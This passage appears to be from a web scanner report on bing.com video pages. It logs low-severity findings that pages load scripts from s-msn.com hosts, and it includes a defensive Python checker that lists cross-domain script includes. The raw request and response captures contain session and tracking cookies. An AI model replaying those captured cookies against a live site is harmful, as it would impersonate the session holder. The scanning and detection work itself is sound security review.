User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=614
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:54:08 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:53 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=6992B41421FD424494A2E9A2F1D31BD9; domain=.bing.com; path=/
Content-Length: 163651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.4. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:00 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:00 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2E275C0252494A33BD7C7B00733A78E2; domain=.bing.com; path=/
Content-Length: 73214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.5. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:58:54 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:54 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3E58DCD97AD8436DB0D6F76EA649A7C4; domain=.bing.com; path=/
Content-Length: 68575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.6. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:15 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.125 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:15 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=A410FF9BF98B4F51BF7EF5A84D10EA58; domain=.bing.com; path=/
Content-Length: 73861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.7. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

Issue detail

The response dynamically includes the following scripts from other domains (those visible in the response excerpt below):

http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js

Request

GET /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=292
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:48:52 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:59 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=438B0C95E5964EF9BFC5329EA9644004; domain=.bing.com; path=/
Content-Length: 74286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.8. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

Issue detail

The response dynamically includes the following scripts from other domains (those visible in the response excerpt below):

http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js

Request

GET /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:12 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=296FB50835524F1CAC808C6CC833F2EF; domain=.bing.com; path=/
Content-Length: 68455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.9. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/tip-stress-and-love/1revqyosz

Issue detail

The response dynamically includes the following scripts from other domains (those visible in the response excerpt below):

http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js

Request

GET /videos/watch/video/tip-stress-and-love/1revqyosz HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:23 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:23 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=5F471059863C43D5904D61DB170BF835; domain=.bing.com; path=/
Content-Length: 72713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...
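
Entries 6.6 to 6.9 all report the same condition: each video page loads jQuery and the video-player scripts from col.stj.s-msn.com and img2.video.s-msn.com, so whatever those hosts serve runs with the full privileges of the www.bing.com origin (cookies, DOM, same-origin requests). The scanner rates this Information because a cross-domain include is a trust decision rather than a bug; the practical caveats are that the includes are fetched over plain http, so a network-position attacker can substitute the script, and that a compromise of the serving host becomes a compromise of the including page. The Python script below is an added example, not code from the XSS.CX report, Burp Suite or Bing, that reproduces the check offline: it parses a response body for script tags and reports every include whose host differs from the requesting host. The function and parameter names (cross_domain_scripts, allowed_suffixes) and the sample response, built from the two script tags visible in the report plus two same-host includes for contrast, are assumptions made for this illustration.

```python
"""Offline reproduction of the "cross-domain script include" check.

Added example for this report; it is not code from XSS.CX, Burp Suite or
Bing. Function names, the allowed_suffixes parameter and the sample
response below are assumptions made for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> start tag, in document order."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            # HTMLParser decodes character references in attribute values,
            # so src="http&#58;&#47;&#47;host&#47;x.js" arrives here as
            # "http://host/x.js", exactly as a browser would resolve it.
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def cross_domain_scripts(page_url, body, allowed_suffixes=()):
    """Return absolute URLs of <script src> includes served by a host other
    than the page's own, in document order.

    Relative and protocol-relative sources are resolved against page_url
    first, so "/js/x.js" and "//www.bing.com/x.js" on a www.bing.com page
    are not reported. Hosts matching an entry in allowed_suffixes (e.g.
    ".s-msn.com" for hosts the reviewer treats as the same trust domain)
    are skipped; that is how an Information-level finding like this one is
    triaged without silencing genuinely third-party includes.
    """
    page_host = (urlsplit(page_url).hostname or "").lower()
    collector = _ScriptSrcCollector()
    collector.feed(body)
    collector.close()

    findings = []
    for src in collector.srcs:
        absolute = urljoin(page_url, src)
        parts = urlsplit(absolute)
        if parts.scheme not in ("http", "https"):
            continue  # data:, javascript: etc. are not remote includes
        host = (parts.hostname or "").lower()
        if not host or host == page_host:
            continue
        # Suffix entries carry a leading dot so "evil-s-msn.com" cannot match.
        if any(host == s.lstrip(".") or host.endswith(s) for s in allowed_suffixes):
            continue
        findings.append(absolute)
    return findings


# Constructed sample: the two script tags visible in the report's response
# excerpt, plus a same-host and a protocol-relative include for contrast.
SAMPLE_RESPONSE = (
    '<html><head>'
    '<script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com'
    '&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script>'
    '<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com'
    '&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>'
    '<script src="/videos/common.js"></script>'
    '<script src="//www.bing.com/videos/shared.js"></script>'
    '</head><body></body></html>'
)
SAMPLE_PAGE_URL = "http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz"


if __name__ == "__main__":
    for url in cross_domain_scripts(SAMPLE_PAGE_URL, SAMPLE_RESPONSE):
        print("cross-domain script include:", url)
    print("after allowing .s-msn.com:",
          cross_domain_scripts(SAMPLE_PAGE_URL, SAMPLE_RESPONSE,
                               allowed_suffixes=(".s-msn.com",)))
```

Run against the constructed sample, the check reports the two s-msn.com includes and nothing else; passing allowed_suffixes=(".s-msn.com",) empties the list, which is the triage outcome for hosts the reviewer accepts as part of the same trust domain. The check is static: a script tag that other JavaScript inserts at runtime (document.write, createElement) is not visible to it, so a full review also needs the page loaded in a browser with the network log open. The entity-encoded form of the URLs in the report is not an obstacle, because the parser decodes attribute values the same way a browser does.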
